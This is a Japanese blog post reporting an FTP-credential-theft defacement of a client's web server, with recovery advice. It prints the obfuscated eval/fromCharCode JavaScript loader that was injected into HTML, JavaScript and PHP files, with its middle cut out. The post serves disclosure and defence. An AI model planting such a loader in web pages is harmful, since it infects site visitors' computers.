WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

小笠原健一 大園転売塾 BBIZ 権利収入 レンタルサーバー 無断送信 比較 出店料 株式会社バンザイ iphone セキュリティ ウインドウ Login LockDown 特権ビジネス SEO 大西良幸 株式会社WINGOOD 不正送信 球体 ファビコン スタイルシート せどり Windows 株式会社SRシステム レタープレス アレックス 滑らか 村上省吾 バナー 無料オファー 加工 document.all ハート 短縮URL IBS office 株式会社A-ブログレス サンタ Favicon ムーバブルタイプ 量産 上位表示 情報商材 クロスアフィリエイト SyntaxHighlighter クラック グラデーション 与沢翼 アクセス制限 個人情報 ぼかし やしろ塾 不正アクセス Extension Manager 詐欺組織 WEB 固定ページ メモ 高額塾 ランキング 申請金ビジネス ツイッター BUYMA RSS Includes Pages ソースコード ライン ブロックポリシー フォローマティック 管理ツール スマホ wp-login.php 放射線 IE メルマガ配信システム 到達率 system 久積篤史 改ざん DOCTYPE プロモーション Tiger-Wing 池田純矢 Chrome 副業術 High Concept Marketing トレンドアフィリエイト ユーチューブマニアクス2017 クラウド変換 アドセンス 土屋ひろし トラフィック RSS エディタ 大園式転売塾 CS5 MasterCollection レイアウト Windows 7 Thunderbird タスクバー アフィ匠 Adobe ネットビジネス大全集 WP 脆弱性 既得権益 Yahoo twitter 蝶乃舞 Google Maps API スムーズ 表示 ネットゲーム Youtube Ban Hammer Agency Business エクスプローラー 宮田麗花 テーマ getElementByTagName IP 立体 ブルートフォースアタック 山下 流出 HTML4.0 ビジネス バックアップ ネットガレージ スクロール レビュー 自己アフィリ 原田真 マニュアル ヤフーショッピング SKナレッジ ブラクラ スカイプ 自己アフィリエイト インターネットエクスプローラー Diamond Affiliate Masters Program 伊藤 歩 Google Maps DTD ドメイン シャンプー インペリアルゴールド tool デスクトップ 復元 切り抜き ざくざく君 特定のメールアドレス getElementById android フレンドシップメール css 背景 MT 自動 アイコン 定型文 ヤフオク explorer Cash on Wordpress 伊藤虎太郎 タイガーウイング Baidu 自動化 81a338 大園麗花 管理画面 Firefox ソフト ネオヒルズアカデミー 個人情報流出 新井浩 もざ テンプレート サイト改ざん 石井匠 ECサイト CS6 伊藤 虎太郎 ネットビジネス 北川 雅嗣 アフィリエイト ネットビジネス最後の楽園 XHTML 音量アイコン KMS認証 Newpost Catch CGI やしろひろたみ バイマ force puzzle レイアウト崩れ 株式会社SRシステム RMT 切抜き アンダーグラウンドメソッド 伊藤塾 followmatic MovableTYpe プラグイン 株式会社Free Agent Style アレックス式ネオせどりスクール ワードプレス 感染 JavaScript ping 関根塾 与沢翼×蝶乃舞 インターネットビジネススクール 関根義光 人物 マルウエア ping送信 ボタン 高速ゲーム wpXサーバー @PAGES EC LinkShaker .htaccess moza FireWorks 詐欺 postpost 掲示板 クラウド入力機能 カスタマイズ ライオンアフィリエイト 画像 転売大園塾 賢威 PPC 秀吉塾天下統一 SmoothScroll.js アクセスアップ 加藤 秀吉 インフォトップ 優先順位 Line プロファイル 登録禁止 google 配布 Wordpress Content Slide ブラウザ コピーボタン ライブチャット モザイク 無料 中山秀人 エクスチェンジ html 日本語入力変換ソフト インターネット YouTube Maniax 2017 KMSpico FTP 改竄 秒速で1億円稼ぐ男 PHP 百度 ソース バイドゥー ツール アンダーグラウンドアフィリエイトクラブ リンクシェイカー Internet Explorer ヤフー 短縮URLツール マイクロソフト トレンドキーワード ウイルス 株式会社ニュース ロリポップ 三橋美仁 クリックランキング ブラシ wordpress ブロック パズル ネットショップ functions.php がら空きビジネス 不労所得の神 エキスパートメール

アーカイブ

エステトラブル

このページの先頭へ